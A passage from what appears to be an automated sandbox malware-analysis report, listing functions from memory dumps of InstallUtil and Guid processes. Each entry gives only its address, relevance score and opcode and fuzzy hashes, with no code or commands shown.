                                                                          • Source File: 00000002.00000002.2452571438.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_1470000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 13eb9a3737a0c46997a73b3c2e6398ebe4e82a4de803058ccb7528c2328e1a79
                                                                          • Instruction ID: 3526161edb16cf7b2bd4f3e337af384c2c2d459654b7330edb4473eb49bf7416
                                                                          • Opcode Fuzzy Hash: 13eb9a3737a0c46997a73b3c2e6398ebe4e82a4de803058ccb7528c2328e1a79
                                                                          • Instruction Fuzzy Hash: 0911A3B5F013159FDBA1AB7898486AFBBF9FB88650B10457BE909D3314EB348D018B81
                                                                          Function 0147143E Relevance: .1, Instructions: 57COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2452571438.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_1470000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 699c20b23373679e09f00567a82966b7f36dc8dc36a098ae5430894537858b6e
                                                                          • Instruction ID: fa627451b1c6932d63c3c3d192195b3ab67c7ba3985c45d6ba7717084b342735
                                                                          • Opcode Fuzzy Hash: 699c20b23373679e09f00567a82966b7f36dc8dc36a098ae5430894537858b6e
                                                                          • Instruction Fuzzy Hash: CA115A31A002168FCB61EFB984401EE7BF5EB98620F10057BD805E7311E735D8428B91
                                                                          Function 0147080F Relevance: .1, Instructions: 57COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2452571438.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_1470000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c4685457031e133b373d3ce7ec69eb35e058c3f79adf43f3bd57291b60ba4456
                                                                          • Instruction ID: 2b0d51f30272f553c8b4a325bec155040aa32617596e4f7d28d7efb51d3722a2
                                                                          • Opcode Fuzzy Hash: c4685457031e133b373d3ce7ec69eb35e058c3f79adf43f3bd57291b60ba4456
                                                                          • Instruction Fuzzy Hash: 1111A532B0221997DF166A3DD4603DA3B91EB86264F26456BE106CF366DA70D84A8BC0
                                                                          Function 0141D3E7 Relevance: .1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2451390444.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_141d000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                          • Instruction ID: f6511775419875bddf79656dd5e2920553d392f2ed9b901481b7ccdc11a8f539
                                                                          • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                          • Instruction Fuzzy Hash: CD11D2B6844240CFCB06CF44D5C4B56BF62FB84314F24C5AAD8090B66AC33AD456CBA1
                                                                          Function 01471448 Relevance: .1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2452571438.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_1470000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 709777bada5fd030322e71db1cd34ef08b6d022621af035809f8cef0137fd0d4
                                                                          • Instruction ID: 50f864588e19294c4ceb168549fc16f7598ffb92c25fe504b00d4ad701d44aa5
                                                                          • Opcode Fuzzy Hash: 709777bada5fd030322e71db1cd34ef08b6d022621af035809f8cef0137fd0d4
                                                                          • Instruction Fuzzy Hash: 3B014C32E012169FCB21EFB988501EEBBF5EF59624F24047BD905E7311E635D9418BA1
                                                                          Function 01479840 Relevance: .0, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2452571438.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_1470000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 64fe608428ba77c547e0cf57640ea1375947485d4befb08d638dd43f7474d566
                                                                          • Instruction ID: 4eb4ea9267d5f913b2dfcbd1ece69f7736e56f867a916150c1b8ef148bb5e276
                                                                          • Opcode Fuzzy Hash: 64fe608428ba77c547e0cf57640ea1375947485d4befb08d638dd43f7474d566
                                                                          • Instruction Fuzzy Hash: 8801B530A00105CBDB14EF59D88478ABBB5FF94320F64C169C9086B39AEBB4A905C7A0
                                                                          Function 01477038 Relevance: .0, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2452571438.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_1470000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 87fe179ead67d14bd2a827349fc8845662a643b69116753c662d009befafa086
                                                                          • Instruction ID: c89997e37ecd679ab622fb1f89ce7d31e8d471f5dabeabc9adc072c5b951b765
                                                                          • Opcode Fuzzy Hash: 87fe179ead67d14bd2a827349fc8845662a643b69116753c662d009befafa086
                                                                          • Instruction Fuzzy Hash: 4F01C439B001158FC754DB78D59896D7BB2EF89216B5540A8E906CB3B9DB31AD42CB40
                                                                          Function 014780A9 Relevance: .0, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2452571438.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_1470000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5edbabc832d1c960b5f35427888b4b34ce9629b8157ec0217eb9615fa33a2b3d
                                                                          • Instruction ID: 5c5912a85f71b06c5749e6c88c9ab57c9b56da1af13ffc47635734ca227215f2
                                                                          • Opcode Fuzzy Hash: 5edbabc832d1c960b5f35427888b4b34ce9629b8157ec0217eb9615fa33a2b3d
                                                                          • Instruction Fuzzy Hash: 3601447091124AEFDB45FFA8E89059C7FB1EB81350F0055BEC104AB265EE742E059B91
                                                                          Function 014780B8 Relevance: .0, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2452571438.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_1470000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f96a53768498ebdab39298c25d69b7f1459240a042c786d2a843a2c7ee28a1cc
                                                                          • Instruction ID: 65752549c248cefc62870fae630bb260117cacc03ee5e4d136ada22fde03989a
                                                                          • Opcode Fuzzy Hash: f96a53768498ebdab39298c25d69b7f1459240a042c786d2a843a2c7ee28a1cc
                                                                          • Instruction Fuzzy Hash: BBF04430A1114EEFEB05FFA8F99055D7FB1EB80340F5055ADC104A7258EE702E049BD1
                                                                          Function 0147D0B8 Relevance: .0, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2452571438.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_1470000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cafdd1bd8437d41049994b50357dbe75230edcc699add937b1988a44fb15ba6e
                                                                          • Instruction ID: 8534b116997d813965aa95395ea886eb14308674dced13f72485ed47187f6a81
                                                                          • Opcode Fuzzy Hash: cafdd1bd8437d41049994b50357dbe75230edcc699add937b1988a44fb15ba6e
                                                                          • Instruction Fuzzy Hash: 18F0A7B5500140AFDB0587B9DC88EEBBBACEBC5315715919AE18887417C534994AC3B0
                                                                          Function 0147D0F4 Relevance: .0, Instructions: 28COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2452571438.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_1470000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d9904f8785af9110ed2faa30d21c318ea937f294b07c59cb5c4f20f5e81eab1b
                                                                          • Instruction ID: 334948bce2a0ccc2f21fcdacb9883532900607601f245d11d4b2a199a8126816
                                                                          • Opcode Fuzzy Hash: d9904f8785af9110ed2faa30d21c318ea937f294b07c59cb5c4f20f5e81eab1b
                                                                          • Instruction Fuzzy Hash: C9F0E55150E3C04FCF0747755C950E87F38DD8322132941E7E588CB093D6284809C722

                                                                          Executed Functions

                                                                          Function 015AD658 Relevance: 2.2, Strings: 1, Instructions: 983COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: e6IV
                                                                          • API String ID: 0-2934522242
                                                                          • Opcode ID: 067c658652aeb8bd1440459ce55563de4bc64f1f8835547585c8e08713fba3b0
                                                                          • Instruction ID: cc538889f6c76760f9de5d01bd0b4dde9e3b3e4832ce5e5ea95e09eca0389308
                                                                          • Opcode Fuzzy Hash: 067c658652aeb8bd1440459ce55563de4bc64f1f8835547585c8e08713fba3b0
                                                                          • Instruction Fuzzy Hash: 63A2A375A00228CFDB65DF69C984A9DBBB2FF89304F1581E9D509AB325DB319E81CF40
                                                                          Function 015AED98 Relevance: .7, Instructions: 696COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ae2afc5a46627ce8ec9d39f8cd0eaac3a3a97a2a34343508fce0c296c17072d8
                                                                          • Instruction ID: 9eb24ba76a373159fbc29ddc0dfa0f2ef2052eacbe936d2a8efaf16aa64b74a1
                                                                          • Opcode Fuzzy Hash: ae2afc5a46627ce8ec9d39f8cd0eaac3a3a97a2a34343508fce0c296c17072d8
                                                                          • Instruction Fuzzy Hash: 7B423830B402058FDB15DF69C884A6D7BE6FF89314B6584AAE606CF3A5DB31EC42CB51
                                                                          Function 06072E83 Relevance: 2.6, Strings: 2, Instructions: 54COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $$%
                                                                          • API String ID: 0-2062090959
                                                                          • Opcode ID: 83b124688271a1a814edffe5d93deed28963f63711fcccbc99290079060ab29f
                                                                          • Instruction ID: 3f1c1921b47462bd478d73c3c90335a226a1d12da6e45f329bef784e0cbea4bd
                                                                          • Opcode Fuzzy Hash: 83b124688271a1a814edffe5d93deed28963f63711fcccbc99290079060ab29f
                                                                          • Instruction Fuzzy Hash: F621BF74D4122AEFDBA4DF64D988BA9BBF1FB08300F1041EAD518A7251DB35AAC5DF04
                                                                          Function 06072ABC Relevance: 2.5, Strings: 2, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: %$;
                                                                          • API String ID: 0-2166642075
                                                                          • Opcode ID: 10cac55ea91ac18de321922691bc8eef32e3733885406dac1d1c24c58b77b5b8
                                                                          • Instruction ID: dc7facbb929bc204861f448da7c5e2cf9791c786828bdfad5fdbb12b454c58ae
                                                                          • Opcode Fuzzy Hash: 10cac55ea91ac18de321922691bc8eef32e3733885406dac1d1c24c58b77b5b8
                                                                          • Instruction Fuzzy Hash: 7421B0B4D4122ADFDBA4DF14DD90BADBBB1BB59300F1080EAD909A7240D771AE81DF44
                                                                          Function 06073AA6 Relevance: 2.5, Strings: 2, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $C
                                                                          • API String ID: 0-3643895422
                                                                          • Opcode ID: d35f265d34993e0f09b0f7665dc9f425391e848897f4ea4daf3f4ebc3381f28f
                                                                          • Instruction ID: f224d5e4be93a30215165d1889685ae05e2921e8f374ef95c9f0fc80a57fabc9
                                                                          • Opcode Fuzzy Hash: d35f265d34993e0f09b0f7665dc9f425391e848897f4ea4daf3f4ebc3381f28f
                                                                          • Instruction Fuzzy Hash: 5101DDB4C8522ADFDBA4CF10CA48BA9BBF1BB04300F0041EAD508A7251D3789BC4DF04
                                                                          Function 0607374C Relevance: 2.5, Strings: 2, Instructions: 28COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: %$?
                                                                          • API String ID: 0-2252968322
                                                                          • Opcode ID: 712cdad18a67d16f245295f25edf0292d04e03e6063843eed76a2d7ee24fef13
                                                                          • Instruction ID: 4ca9f74516c767311a6653a5c83de64bfc2b5c1e206f477ae715fba3e2c29ad0
                                                                          • Opcode Fuzzy Hash: 712cdad18a67d16f245295f25edf0292d04e03e6063843eed76a2d7ee24fef13
                                                                          • Instruction Fuzzy Hash: ED019D74D4122A9FDBA5DF54CA94BADBBB1BB58300F1080EA9918A3680D7716E81DF44
                                                                          Function 06073554 Relevance: 1.3, Strings: 1, Instructions: 38COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 2
                                                                          • API String ID: 0-450215437
                                                                          • Opcode ID: d504695cfefb92df47eafee85f8c1cacf2fe9100921b89120e6a9ecba2061f96
                                                                          • Instruction ID: 48129c57c6732cb8f8e0de5eefc2fc29dc01f04cd3ea8617c22bf7b2d4ed8107
                                                                          • Opcode Fuzzy Hash: d504695cfefb92df47eafee85f8c1cacf2fe9100921b89120e6a9ecba2061f96
                                                                          • Instruction Fuzzy Hash: 0E11EE74E002698FDBA4DF64C854BEEBBB1FB49304F0080EA9949A7284DB315E85CF51
                                                                          Function 060732D8 Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 1
                                                                          • API String ID: 0-2212294583
                                                                          • Opcode ID: 6d65927f1681ab4b24420a157683dcc2964029ba03926b91af73ede71cac1a4b
                                                                          • Instruction ID: e9f068f7fa438adcd596caf8d4e92a6b556ddd2d4cfadfcff62a4d40d625c2c6
                                                                          • Opcode Fuzzy Hash: 6d65927f1681ab4b24420a157683dcc2964029ba03926b91af73ede71cac1a4b
                                                                          • Instruction Fuzzy Hash: 2C01C074E4122ADFDBA9DF14C990BDAB7F1BB49300F4041EAD409A7250DB31AE85CF05
                                                                          Function 06072D93 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 1
                                                                          • API String ID: 0-2212294583
                                                                          • Opcode ID: 3748980385b83f380c3c63fd7d489c98fdf4bad8377db2a6c1e09509a8c1ece0
                                                                          • Instruction ID: 8f635e6b814dbc7204860c6847797dcc75263d7e523209c679a582cb4f497c49
                                                                          • Opcode Fuzzy Hash: 3748980385b83f380c3c63fd7d489c98fdf4bad8377db2a6c1e09509a8c1ece0
                                                                          • Instruction Fuzzy Hash: 0C01D274D8021ADFDBA4CF08CA44B9ABBF1BB09300F0040EAD809A7251D775AEC5DF04
                                                                          Function 06073747 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: %
                                                                          • API String ID: 0-2567322570
                                                                          • Opcode ID: 224d10999734a9e4736094e137c7a001e32b2f409bc43ccea0ab8349cc72fa1a
                                                                          • Instruction ID: 56807e985bde843ff12b7dfb81b5c84a624007e00de8004eeb2477b63309c5e6
                                                                          • Opcode Fuzzy Hash: 224d10999734a9e4736094e137c7a001e32b2f409bc43ccea0ab8349cc72fa1a
                                                                          • Instruction Fuzzy Hash: 2EF09278A4112ADFDBA4DF54DD90FADBBB1BB58300F1080EA9909A7740D771AE819F44
                                                                          Function 0768075F Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2499586538.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7680000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: r
                                                                          • API String ID: 0-1812594589
                                                                          • Opcode ID: 02628fb955efd3d75987410084bd65249fa5cedcf0b54f191a0ab7b26640cd67
                                                                          • Instruction ID: c14a59a586bba87389e551e4a6639c82b06d41396906f4907702470379b5456a
                                                                          • Opcode Fuzzy Hash: 02628fb955efd3d75987410084bd65249fa5cedcf0b54f191a0ab7b26640cd67
                                                                          • Instruction Fuzzy Hash: 7CF03474918219CFCB61EF58C8457AEB7B1FB49314F4009E8D54EA2640D3745E88CF12
                                                                          Function 06073A65 Relevance: 1.3, Strings: 1, Instructions: 13COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID: 0-3916222277
                                                                          • Opcode ID: 6839a619c4fece81ea6d0009abb82e4d4acee4f60727f6baad450dcc752fa3ec
                                                                          • Instruction ID: 31eade2329aa3758e2a64e9999d9062f71cf1f5fa9aee9e1590f99faca7f5089
                                                                          • Opcode Fuzzy Hash: 6839a619c4fece81ea6d0009abb82e4d4acee4f60727f6baad450dcc752fa3ec
                                                                          • Instruction Fuzzy Hash: AFE0BD7980422A8FDB209F20D948BDDBBF5BB58300F0041EA880963256D3345A85DF00
                                                                          Function 060738DB Relevance: 1.3, Strings: 1, Instructions: 13COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ,
                                                                          • API String ID: 0-3772416878
                                                                          • Opcode ID: 846974788d767381f6bc2527026b7791d8074e008bcd4852e71849f5a1cd9d7b
                                                                          • Instruction ID: d57c27ad212ba39ee38837f551b53c1942b246b3d3ffa16e5278fea43638e1f1
                                                                          • Opcode Fuzzy Hash: 846974788d767381f6bc2527026b7791d8074e008bcd4852e71849f5a1cd9d7b
                                                                          • Instruction Fuzzy Hash: CBE0BD78804229CFDB209F20D948BDCBBB5BB0C300F0082DA8499A2295C3749A86CF00
                                                                          Function 015AF628 Relevance: .3, Instructions: 347COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9922e53a53b6c3ede05289d8e86a1f24ebd670abddd451a2bbe4e5f7664834d6
                                                                          • Instruction ID: c818fa318efad8c1243f5eeb6c5ecb8dd8130438eabf56d0c4091dce9a2b7010
                                                                          • Opcode Fuzzy Hash: 9922e53a53b6c3ede05289d8e86a1f24ebd670abddd451a2bbe4e5f7664834d6
                                                                          • Instruction Fuzzy Hash: C7B1DE323042169FEB69DF68D850AAE7FA6FFC4750B14816AE905CB391CB35DC06C7A1
                                                                          Function 015AFAF8 Relevance: .2, Instructions: 208COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e4cd1533e4d6ded92f10588589ea447aff6df3bc528e54edf8c3c1faaf969f27
                                                                          • Instruction ID: da8ee24324070b7167fc4a272b1014da5144b4fdf6ea24d11706b35e628a72a1
                                                                          • Opcode Fuzzy Hash: e4cd1533e4d6ded92f10588589ea447aff6df3bc528e54edf8c3c1faaf969f27
                                                                          • Instruction Fuzzy Hash: 46814835A40218CFCB25DF68C594A9EBBF5FF88310B5585AAE9169B361DB30EC41CF90
                                                                          Function 06070EE7 Relevance: .2, Instructions: 157COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1be34349ef6b4155f567ee5cb667ddd628fa5b2eb81d2d998c5fdbd2c5c67776
                                                                          • Instruction ID: 530196e3af8ebfc5af18cd9ae0b0fd551092105231d2b94b92c585649c3c864f
                                                                          • Opcode Fuzzy Hash: 1be34349ef6b4155f567ee5cb667ddd628fa5b2eb81d2d998c5fdbd2c5c67776
                                                                          • Instruction Fuzzy Hash: AE71E4B4E01218CFDB94EFA4D894B9DBBB2FB49304F1081A9D50AA7358DB745D86CF50
                                                                          Function 015A0C2F Relevance: .1, Instructions: 142COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 150e00f715bd39d306739f347733ce29b10003644abb2ffc8399ce15a2ad6da7
                                                                          • Instruction ID: 72298f2552653b57040916d2d67a9e08fbc5df1ce815e81a020bda0d17877301
                                                                          • Opcode Fuzzy Hash: 150e00f715bd39d306739f347733ce29b10003644abb2ffc8399ce15a2ad6da7
                                                                          • Instruction Fuzzy Hash: 09511471A002098FDB15DF98C484AEDBBF2BF49320F585159E505BB3A1DB34AD85CBA0
                                                                          Function 06070CC7 Relevance: .1, Instructions: 125COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b72489a20bf7c152314d63d337af858c14c878ffbcb5f517a4349069d9c46ffa
                                                                          • Instruction ID: 9f07a49693100108dc251a5ea7371fd6b7b576ff0e29b5fb2ac893d596ec7797
                                                                          • Opcode Fuzzy Hash: b72489a20bf7c152314d63d337af858c14c878ffbcb5f517a4349069d9c46ffa
                                                                          • Instruction Fuzzy Hash: D45168B4E44208CFDB94EF98D894BADBBF2FB49305F1051A9D50AA7258CB745D81CF14
                                                                          Function 060715B0 Relevance: .1, Instructions: 114COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 69493e7383de510c88214e91b6aa7f08951ef629a0671655b8a71f4274266a4f
                                                                          • Instruction ID: 0fe14f8670f2d59cabe0f4b762c1bc5862f9207e85acd8dcf525d67baeb2dddd
                                                                          • Opcode Fuzzy Hash: 69493e7383de510c88214e91b6aa7f08951ef629a0671655b8a71f4274266a4f
                                                                          • Instruction Fuzzy Hash: 12412770E45218CFEB94DF69D850B9DBBF2FB89300F1481AAD409A7298DB344E86CF55
                                                                          Function 06070C0B Relevance: .1, Instructions: 111COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 84e22bacce3e0715d73059bfaa55b144fb3a6e89bf3f3feed4d3b9f240fb5660
                                                                          • Instruction ID: 382ecf026e45fd0977df620eb8b0752ef15984045570b660bca7963f077fe8c3
                                                                          • Opcode Fuzzy Hash: 84e22bacce3e0715d73059bfaa55b144fb3a6e89bf3f3feed4d3b9f240fb5660
                                                                          • Instruction Fuzzy Hash: B74146B0E01208DFDB94DF99D894BEDBBB6FB49301F0081AAD10AA7254DB704D85CF64
